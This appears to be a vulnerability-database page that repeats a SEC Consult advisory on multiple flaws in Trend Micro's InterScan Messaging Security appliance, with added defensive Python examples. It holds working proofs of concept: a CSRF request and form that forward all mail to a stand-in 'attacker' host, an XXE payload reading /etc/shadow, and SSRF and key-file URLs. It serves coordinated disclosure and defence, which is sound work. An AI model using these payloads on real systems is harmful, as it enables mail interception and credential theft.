Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2020
| VAR-202011-0802 | CVE-2020-27693 | Trend Micro InterScan Messaging Security Virtual Appliance Insufficient Password Hash Usage Vulnerability |
CVSS V2: 2.1 CVSS V3: 4.4 Severity: MEDIUM |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 stores administrative passwords using a hash that is considered outdated. No further details are currently provided.
SEC Consult Vulnerability Lab Security Advisory < 20201104-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)
vulnerable version: < 9.1.0 Critical Patch Build 2025
fixed version: 9.1.0 Critical Patch - Build 2025
CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019
CVE-2020-27693, CVE-2020-27694
impact: High
homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
found: 2020-04
by: W. Ettlinger (Office Vienna)
T. Serafin (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Trend Micro™ InterScan™ Messaging Security provides the most comprehensive
protection against both traditional and targeted attacks. Using the correlated
intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox
execution analysis, it blocks spam, phishing, and advanced persistent threats
(APTs)."
URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends performing a thorough security review of this
and similar Trend Micro products, conducted by security professionals, to
identify and resolve potential further security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
A web service accessible to authenticated administrators allows modifying the
appliance's policy configuration. This web service can also be accessed by
leveraging a CSRF scenario. An attacker could therefore modify policy rules
(e.g. bypass malware checks or forward all mails to another host) by tricking
an authenticated administrator into accessing an attacker-controlled web page.
2) XML External Entity Processing (XXE)
CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)
The web service from vulnerability #1 accepts requests in the form of XML documents.
The XML parser used is not configured correctly, thus allowing an authenticated
administrator to read arbitrary local files through XXE.
Through an OOB XXE attack an attacker can exfiltrate local files through CSRF
(see #1).
3) Over-privileged Users/Services
Sudo is configured to allow several system users access to the root account.
An attacker gaining control over one of these accounts can access the system as
root. Moreover, several services are executed with the privileges of the user
root. Therefore, finding #2 allows an attacker to read files only accessible to
root (e.g. /etc/shadow).
4) Server Side Request Forgery (SSRF) & Local File Disclosure
CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)
A script accessible through the appliance's web server can be abused to request
any URL (e.g. http(s), file). An authenticated attacker can, for example, access
arbitrary http(s) resources or parts of some local files.
5) Information Disclosure
CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
An SQLite database as well as a cryptographic key located in the webroot can be
accessed without authentication.
Note: It is unclear what the key is used for and whether the SQLite database
could contain sensitive information in specific configurations.
6) Insufficient Password Storage
CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)
The appliance stores passwords of administrative users as unsalted MD5 hashes
which can be cracked easily.
7) Outdated Software
CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
Several software components installed on the appliance are outdated. Moreover,
the software updates provided by Trend Micro do not update the packages of the
CentOS base system.
SEC Consult did not verify whether the vulnerabilities identified through the
version information are present or whether the vulnerabilities have an impact
on the security of the system.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016)
The following request will create a rule that forwards all mails to an attacker:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]
Cookie: JSESSIONID=[...];
Content-Length: 374
<policies>
<policy
name="forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes"
version="1"
order="1"
type="other">
<route direction="incoming">
<from anyone="yes"></from>
<to anyone="yes"></to>
</route>
<actions>
<hand_off>attacker:25</hand_off>
</actions>
</policy>
</policies>
--- snip ---
The following HTML fragment shows how this request can be sent in a CSRF
scenario:
--- snip ---
<form action="https://[...]:8445/ws_policies.imss" method="POST"
enctype="text/plain">
<input type="hidden" name='<policies><policy name'
value='"forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes" version="1" order="1" type="other">
<route direction="incoming"><from anyone="yes"></from>
<to anyone="yes"></to></route>
<actions><hand_off>attacker:25</hand_off></actions>
</policy></policies>' />
<input type="submit" value="Submit request" />
</form>
--- snip ---
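As an added example from the defender's side (not code from the advisory or from the product), the following Python reconstructs the request body the form above produces, shows that body-level XML validation alone cannot tell it from a legitimate policy update, and applies the transport-level checks (Content-Type, Origin/Referer, per-session token) that a policy web service needs to reject it. The appliance origin, the token header name, the session store and both sample requests are assumptions.

```python
import hmac
import xml.etree.ElementTree as ET

# Assumptions (not from the advisory): the appliance's own origin, the header
# carrying the per-session anti-CSRF token, and a constructed session store.
APPLIANCE_ORIGIN = "https://imsva.example.invalid:8445"
TOKEN_HEADER = "x-csrf-token"
SESSION_TOKENS = {"JSESSIONID=abc123": "tok-7f3a9c"}


def form_encoded_body(name: str, value: str) -> str:
    """Body a browser sends for <form enctype="text/plain"> with one field:
    name, '=', value, CRLF; line breaks inside the value become CRLF."""
    value = value.replace("\r\n", "\n").replace("\n", "\r\n")
    return name + "=" + value + "\r\n"


def hand_off_target(body: str):
    """Body-level validation only: parse as a policy document and return the
    hand_off host, or None if the body is not a well-formed policy."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find("policy/actions/hand_off")
    if root.tag != "policies" or node is None:
        return None
    return node.text


def csrf_violations(headers: dict, session_cookie: str) -> list:
    """Transport-level checks for the policy web service. Returns the failed
    checks in a fixed order; an empty list means the request may proceed."""
    h = {k.lower(): v for k, v in headers.items()}
    failed = []
    # A plain HTML form can only send text/plain, urlencoded or multipart
    # bodies; any other type from another origin triggers a CORS preflight.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in ("application/xml", "text/xml"):
        failed.append("content-type")
    referer = h.get("referer", "")
    if not (h.get("origin") == APPLIANCE_ORIGIN
            or referer.startswith(APPLIANCE_ORIGIN + "/")):
        failed.append("origin")
    expected = SESSION_TOKENS.get(session_cookie, "")
    if not expected or not hmac.compare_digest(h.get(TOKEN_HEADER, ""), expected):
        failed.append("csrf-token")
    return failed


# Constructed: the hidden field from the advisory's form, as the victim's
# browser would submit it, and a legitimate request from the appliance's UI.
FORM_NAME = "<policies><policy name"
FORM_VALUE = ('"forward all traffic to attacker"\n'
              'note="forward all traffic to attacker"\n'
              'enable="yes" version="1" order="1" type="other">\n'
              '<route direction="incoming"><from anyone="yes"></from>\n'
              '<to anyone="yes"></to></route>\n'
              '<actions><hand_off>attacker:25</hand_off></actions>\n'
              '</policy></policies>')
CSRF_HEADERS = {"Content-Type": "text/plain",
                "Origin": "https://attacker.example.invalid",
                "Cookie": "JSESSIONID=abc123"}
LEGIT_HEADERS = {"Content-Type": "application/xml; charset=utf-8",
                 "Origin": APPLIANCE_ORIGIN,
                 "Cookie": "JSESSIONID=abc123",
                 "X-CSRF-Token": "tok-7f3a9c"}
LEGIT_BODY = ('<policies><policy name="relay" note="" enable="yes" version="1" '
              'order="1" type="other"><actions><hand_off>relay.internal:25'
              '</hand_off></actions></policy></policies>')


def decide(headers: dict, body: str) -> dict:
    """Both views side by side: what the XML says, and whether to act on it."""
    cookie = headers.get("Cookie", "")
    return {"hand_off": hand_off_target(body),
            "violations": csrf_violations(headers, cookie)}


if __name__ == "__main__":
    # The forged body parses as a valid policy; only the transport checks catch it.
    print(decide(CSRF_HEADERS, form_encoded_body(FORM_NAME, FORM_VALUE)))
    print(decide(LEGIT_HEADERS, LEGIT_BODY))
```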
2) XML External Entity Processing (XXE) (CVE-2020-27017)
The following request demonstrates the retrieval of /etc/shadow:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]:8445
Cookie: JSESSIONID=[...];
Content-Length: 290
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<policies>
<policy name="test" note="test" enable="yes" version="1" order="2" type="virus">
<route direction="incoming">
<from anyone="no">
<group>&xxe;</group>
</from>
</route>
</policy>
</policies>
--- snip ---
3) Over-privileged Users/Services
The local users "admin", "enable" and all users in the group "cliusers" can execute
commands as root (no password entry required). Note that at least for the users
"admin" and "enable" a restricted shell is configured, thus shell access is not
easily possible.
Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root.
Trend Micro supplied the following additional information:
(a) If an IMSVA user created clish users, they can only run limited commands
(IMSVA pre-defined commands) and all of these are one time commands
(not a running service in the backend)
(b) Most of these clish commands only read logs and do not accept any arguments,
so they cannot terminate or inject commands.
(c) A few commands (such as ping) accept only a few arguments (such as an IP), but these
are well-checked. Users cannot input any arguments with another meaning, so they
cannot terminate or inject commands.
Trend Micro decided not to include vulnerability #3 in the hardening/patch of the
product, as the "admin" and "enable" accounts are as important as root and changing
the architecture would cause some functions not to work as expected.
4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018)
The following URL demonstrates the retrieval of an HTTP URL through the appliance:
https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test
When accessing file:// URLs, the application sends only the content that follows
a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved.
5) Information Disclosure (CVE-2020-27019)
The following URL demonstrates the unauthenticated retrieval of a cryptographic
key:
https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key
Moreover, an SQLite database can be retrieved from:
https://<host>:8445/widget/repository/db/sqlite/tmwf.db
The contents of these files have not been further investigated.
6) Insufficient Password Storage (CVE-2020-27693)
The passwords for local administrators are stored in a Postgres database
(table tb_administrator, column md5_digest). The hashes are stored as unsalted
MD5 digests which can be cracked easily.
7) Outdated Software (CVE-2020-27694)
The following software versions are present in an appliance with patch level
1993:
* PHP 5.6.38 (PHP 5.6 is EOL)
* Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html)
* Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html)
The appliance is built on top of a CentOS base system. The CentOS packages
appear not to be updated with appliance updates. In a test system, the command
"yum check-update" yielded 203 updates to installed packages.
Vulnerable / tested versions:
-----------------------------
Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be
vulnerable. Previous versions are affected as well.
Vendor contact timeline:
------------------------
2020-04-28: Contacting vendor through security@trendmicro.com
Submitting advisory information encrypted (PGP).
2020-04-28: Vendor reply, they will take a look at the issue.
2020-05-06: Vendor states that vulnerability resolution is in progress;
Vendor has questions regarding two vulnerabilities
2020-05-07: Clarifying vulnerabilities
2020-05-25: Asking for status update
2020-05-25: Vendor: Vulnerability resolution is still in progress,
details follow
2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June
2020-06-29: Asking for status update
2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6
2020-07-07: Sending results of short recheck
#1 CSRF - fixed
#2 XXE - fixed
#4 SSRF/LFD - fixed
#5 InfoDisc - fixed
#6 Password Storage - not properly fixed yet
2020-07-08: Vendor confirms receipt; has question regarding #3
2020-07-10: Clarifying questions
2020-08-04: Asking for a status update
2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress.
2020-08-22: Vendor provides information that all issues have been fixed except
issue #3 as hardening it further would potentially break some features.
2020-08-24: Further advisory release coordination (date, CVE numbers, patch version)
2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the
official critical patch to be used for public disclosure is still being
finalized"; disclosure date will be communicated later
2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet
which will be coordinated
2020-11-04: Coordinated release of security advisory
Solution:
---------
The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025)
which should be installed immediately. The release notes can be found here:
https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt
Patch download:
https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91
https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz
Trend Micro Security Bulletin:
https://success.trendmicro.com/solution/000279833
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2020
| VAR-202011-0745 | CVE-2020-27018 | Trend Micro InterScan Messaging Security Virtual Appliance Server-side Request Forgery Vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to a server side request forgery vulnerability which could allow an authenticated attacker to abuse the product's web server and grant access to web resources or parts of local files. An attacker must already have obtained authenticated privileges on the product to exploit this vulnerability. An attacker can use the web page controlled by the vulnerability to modify the policy rules.
| VAR-202011-0743 | CVE-2020-27016 | Trend Micro InterScan Messaging Security Virtual Appliance Cross Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to a cross-site request forgery (CSRF) vulnerability which could allow an attacker to modify policy rules by tricking an authenticated administrator into accessing an attacker-controlled web page. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. An attacker can use this vulnerability to send unexpected requests to the server through the affected client.
SEC Consult Vulnerability Lab Security Advisory < 20201104-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)
vulnerable version: < 9.1.0 Critical Patch Build 2025
fixed version: 9.1.0 Critical Patch - Build 2025
CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019
CVE-2020-27693, CVE-2020-27694
impact: High
homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
found: 2020-04
by: W. Ettlinger (Office Vienna)
T. Serafin (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Trend Micro™ InterScan™ Messaging Security provides the most comprehensive
protection against both traditional and targeted attacks. Using the correlated
intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox
execution analysis, it blocks spam, phishing, and advanced persistent threats
(APTs)."
URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends performing a thorough security review of this
and similar Trend Micro products, conducted by security professionals, to
identify and resolve potential further security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
A web service accessible to authenticated administrators allows modifying the
appliance's policy configuration. This web service can also be accessed by
leveraging a CSRF scenario. An attacker could therefore modify policy rules
(e.g. bypass malware checks or forward all mails to another host) by tricking
an authenticated administrator into accessing an attacker-controlled web page.
2) XML External Entity Processing (XXE)
CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)
The web service from vulnerability #1 accepts requests in the form of XML documents.
The XML parser used is not configured correctly, thus allowing an authenticated
administrator to read arbitrary local files through XXE.
Through an OOB XXE attack an attacker can exfiltrate local files through CSRF
(see #1).
3) Over-privileged Users/Services
Sudo is configured to allow several system users access to the root account.
An attacker gaining control over one of these accounts can access the system as
root. Moreover, several services are executed with the privileges of the user
root. Therefore, finding #2 allows an attacker to read files only accessible to
root (e.g. /etc/shadow).
4) Server Side Request Forgery (SSRF) & Local File Disclosure
CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)
A script accessible through the appliance's web server can be abused to request
any URL (e.g. http(s), file). An authenticated attacker can, for example, access
arbitrary http(s) resources or parts of some local files.
5) Information Disclosure
CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
An SQLite database as well as a cryptographic key located in the webroot can be
accessed without authentication.
Note: It is unclear what the key is used for and whether the SQLite database
could contain sensitive information in specific configurations.
6) Insufficient Password Storage
CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)
The appliance stores passwords of administrative users as unsalted MD5 hashes
which can be cracked easily.
7) Outdated Software
CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
Several software components installed on the appliance are outdated. Moreover,
the software updates provided by Trend Micro do not update the packages of the
CentOS base system.
SEC Consult did not verify whether the vulnerabilities identified through the
version information are present or whether the vulnerabilities have an impact
on the security of the system.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016)
The following request will create a rule that forwards all mails to an attacker:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]
Cookie: JSESSIONID=[...];
Content-Length: 374
<policies>
<policy
name="forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes"
version="1"
order="1"
type="other">
<route direction="incoming">
<from anyone="yes"></from>
<to anyone="yes"></to>
</route>
<actions>
<hand_off>attacker:25</hand_off>
</actions>
</policy>
</policies>
--- snip ---
The following HTML fragment shows how this request can be sent in a CSRF
scenario:
--- snip ---
<form action="https://[...]:8445/ws_policies.imss" method="POST"
enctype="text/plain">
<input type="hidden" name='<policies><policy name'
value='"forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes" version="1" order="1" type="other">
<route direction="incoming"><from anyone="yes"></from>
<to anyone="yes"></to></route>
<actions><hand_off>attacker:25</hand_off></actions>
</policy></policies>' />
<input type="submit" value="Submit request" />
</form>
--- snip ---
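The form above works because enctype="text/plain" makes the browser emit each field as a raw "name=value" line with no escaping, so a single hidden field can carry a complete XML document. The following is an added example (not code from the SEC Consult advisory or from Trend Micro) that reproduces that encoding, shows what an unprotected XML policy endpoint would extract from the forged body, and sketches the server-side checks that defeat it. The hostname in APPLIANCE_ORIGIN and the X-CSRF-Token header are assumptions for the sake of the example.

```python
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# The single hidden field from the advisory's CSRF form: the field name carries
# the first part of the XML, the value carries the rest.
FORM_FIELDS = [
    (
        '<policies><policy name',
        '"forward all traffic to attacker"\n'
        'note="forward all traffic to attacker"\n'
        'enable="yes" version="1" order="1" type="other">\n'
        '<route direction="incoming"><from anyone="yes"></from>\n'
        '<to anyone="yes"></to></route>\n'
        '<actions><hand_off>attacker:25</hand_off></actions>\n'
        '</policy></policies>',
    ),
]

# Assumed origin of the appliance's admin interface (the hostname is made up).
APPLIANCE_ORIGIN = "https://imsva.example.test:8445"


def text_plain_form_body(fields):
    """Encode fields the way a browser does for enctype="text/plain":
    'name=value' per field, each terminated by CRLF, with no escaping of
    '<', '"' or newlines. That missing escaping is what turns a form post
    into a well-formed XML document on the wire."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def hand_off_rules(xml_body):
    """What a policy endpoint without CSRF protection would act on:
    (policy name, hand-off destination) for each policy that hands mail off."""
    root = ET.fromstring(xml_body)
    return [
        (policy.get("name"), hand_off.text)
        for policy in root.iter("policy")
        for hand_off in policy.iter("hand_off")
    ]


def _same_origin(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == APPLIANCE_ORIGIN


def accept_policy_request(headers, session_csrf_token):
    """Server-side checks that reject the forged request while accepting the
    legitimate admin-UI request. Returns (accepted, reason)."""
    h = {k.lower(): v for k, v in headers.items()}
    # 1. An HTML form can only send text/plain, multipart or urlencoded bodies;
    #    insisting on application/xml forces a scripted request, which the
    #    browser preflights and the appliance never approves cross-origin.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/xml":
        return False, f"unexpected Content-Type {ctype!r}"
    # 2. The browser sets Origin (or at least Referer) to the attacker's page;
    #    compare scheme://host:port exactly, not by prefix.
    source = h.get("origin") or h.get("referer")
    if not source or not _same_origin(source):
        return False, "missing or foreign Origin/Referer"
    # 3. A per-session token that the attacker's page cannot read.
    token = h.get("x-csrf-token", "")
    if not hmac.compare_digest(token, session_csrf_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"
```

The cookie alone is what the vulnerable endpoint relied on; the browser attaches it to the forged POST automatically, which is why none of the three checks above may depend on it.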
2) XML External Entity Processing (XXE) (CVE-2020-27017)
The following request demonstrates the retrieval of /etc/shadow:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]:8445
Cookie: JSESSIONID=[...];
Content-Length: 290
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<policies>
<policy name="test" note="test" enable="yes" version="1" order="2" type="virus">
<route direction="incoming">
<from anyone="no">
<group>&xxe;</group>
</from>
</route>
</policy>
</policies>
--- snip ---
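The payload above only works because the appliance's parser resolves the SYSTEM entity and splices the file into the <group> element. The following added example (not the advisory's or Trend Micro's code; the appliance's actual parser is not shown on this page) models both behaviours with Python's expat bindings: the vulnerable variant installs an external-entity handler that reads the file, the hardened variant refuses any DOCTYPE before an entity can be declared. FAKE_SHADOW is a constructed stand-in for /etc/shadow so the example runs without root.

```python
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlsplit

# Constructed stand-in for /etc/shadow (not a real hash).
FAKE_SHADOW = "root:$6$saltsalt$constructedhash:18500:0:99999:7:::\n"


def build_poc(file_url):
    """The advisory's payload with the SYSTEM identifier parameterised."""
    return (
        '<!DOCTYPE foo [<!ELEMENT foo ANY >\n'
        f'<!ENTITY xxe SYSTEM "{file_url}" >]>\n'
        '<policies>\n'
        '<policy name="test" note="test" enable="yes" version="1" order="2" type="virus">\n'
        '<route direction="incoming">\n'
        '<from anyone="no">\n'
        '<group>&xxe;</group>\n'
        '</from>\n'
        '</route>\n'
        '</policy>\n'
        '</policies>\n'
    )


def group_text(xml_text, resolve_external_entities):
    """Parse a policy document and return the text of its <group> element.

    resolve_external_entities=True models the misconfigured parser: SYSTEM
    entities are fetched from disk and spliced into the document.
    False models the hardened parser: any DOCTYPE is rejected outright, so no
    entity can be declared at all (the usual fix when DTDs are not needed)."""
    parser = expat.ParserCreate()
    state = {"in_group": False, "text": ""}

    def start(name, attrs):
        if name == "group":
            state["in_group"] = True

    def end(name):
        if name == "group":
            state["in_group"] = False

    def chars(data):
        if state["in_group"]:
            state["text"] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars

    if resolve_external_entities:
        def fetch_entity(context, base, system_id, public_id):
            # file:///etc/shadow -> /etc/shadow. The child parser inherits the
            # handlers above, so the file's bytes land in state["text"] as if
            # they had been written inside <group>.
            path = urlsplit(system_id).path
            with open(path, "rb") as f:
                child = parser.ExternalEntityParserCreate(context)
                child.Parse(f.read(), True)
            return 1
        parser.ExternalEntityRefHandler = fetch_entity
    else:
        def reject_doctype(name, system_id, public_id, has_internal_subset):
            raise ValueError("DOCTYPE declarations are not accepted")
        parser.StartDoctypeDeclHandler = reject_doctype

    parser.Parse(xml_text, True)
    return state["text"]


def run_demo():
    """Returns (leaked text from the vulnerable parser, True if the hardened
    parser refused the same document)."""
    with tempfile.NamedTemporaryFile("w", suffix=".shadow", delete=False) as f:
        f.write(FAKE_SHADOW)
        path = f.name
    try:
        poc = build_poc("file://" + path)
        leaked = group_text(poc, resolve_external_entities=True)
        try:
            group_text(poc, resolve_external_entities=False)
            blocked = False
        except ValueError:
            blocked = True
    finally:
        os.unlink(path)
    return leaked, blocked
```

Rejecting the DOCTYPE (rather than only the entity) is the check to look for when re-testing the patch: a parser that still accepts an internal subset but ignores SYSTEM identifiers remains exposed to parameter-entity and entity-expansion tricks.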
3) Over-privileged Users/Services
The local users "admin", "enable" and all users in the group "cliusers" can execute
commands as root (no password entry required). Note that at least for the users
"admin" and "enable" a restricted shell is configured, thus shell access is not
easily possible.
Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root.
Trend Micro supplied the following additional information:
(a) If an IMSVA user created clish users, they can only run limited commands
(IMSVA pre-defined commands) and all of these are one time commands
(not a running service in the backend)
(b) Most of these clish commands only read logs and do not accept any arguments,
so they cannot terminate or inject commands.
(c) A few commands (such as ping) accept only a few arguments (such as an IP), but these
are well-checked. Users cannot input any arguments with another meaning, so they
cannot terminate or inject commands.
Trend Micro decided not to include vulnerability #3 in the hardening/patch of the
product, as the admin and enable accounts are considered as important as root and
changing the architecture would cause some functions not to work as expected.
4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018)
The following URL demonstrates the retrieval of an HTTP URL through the appliance:
https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test
When accessing file:// URLs, the application returns only the content that follows
the first \r\n\r\n sequence (presumably because the fetched data is treated as an
HTTP response and everything up to the header/body separator is discarded).
Therefore only parts of certain files can be retrieved.
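A fetcher like proxy_controller.php needs two controls the advisory shows were missing: a scheme allowlist (no file://) and a check that the destination is a public address, performed on the resolved IP rather than on the hostname string. The following added example (not the advisory's or Trend Micro's code) implements that check and also models the observed "content after \r\n\r\n" behaviour, which explains why only some local files were partially readable. FAKE_DNS is a constructed resolver table so the example runs offline; a real deployment would resolve with socket.getaddrinfo() and connect to the address it validated.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed resolver table standing in for DNS (all names are made up).
FAKE_DNS = {
    "updates.example.test": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],
}

ALLOWED_SCHEMES = {"http", "https"}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])


def check_proxy_target(url, resolver=fake_resolve):
    """Return (allowed, reason) for a URL handed to a server-side fetcher such
    as the `url` parameter of proxy_controller.php."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:          # blocks file://, gopher://, ...
        return False, f"scheme {scheme!r} not allowed"
    try:
        host = parts.hostname
        parts.port                              # raises on a malformed port
    except ValueError:
        return False, "malformed authority"
    if not host:
        return False, "no host"
    if parts.username or parts.password:        # no credentials smuggling
        return False, "userinfo in URL"
    try:
        addrs = [ipaddress.ip_address(host)]    # IP literal, incl. [::1]
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        return False, f"{host} does not resolve"
    # is_global is False for loopback, link-local (169.254/16, used by cloud
    # metadata services), RFC 1918 and other reserved ranges.
    for addr in addrs:
        if not addr.is_global:
            return False, f"{host} -> {addr} is not a public address"
    return True, "ok"


def body_after_headers(raw):
    """Model of the observed behaviour: the proxy treats whatever it fetched
    as an HTTP response and returns only what follows the first blank line.
    A local file without a CRLFCRLF sequence therefore yields nothing."""
    sep = raw.find(b"\r\n\r\n")
    return b"" if sep < 0 else raw[sep + 4:]
```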
5) Information Disclosure (CVE-2020-27019)
The following URL demonstrates the unauthenticated retrieval of a cryptographic
key:
https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key
Moreover, an SQLite database can be retrieved.
https://<host>:8445/widget/repository/db/sqlite/tmwf.db
The contents of these files have not been further investigated.
6) Insufficient Password Storage (CVE-2020-27693)
The passwords for local administrators are stored in a Postgres database
(table tb_administrator, column md5_digest). The hashes are stored as unsalted
MD5 digests which can be cracked easily.
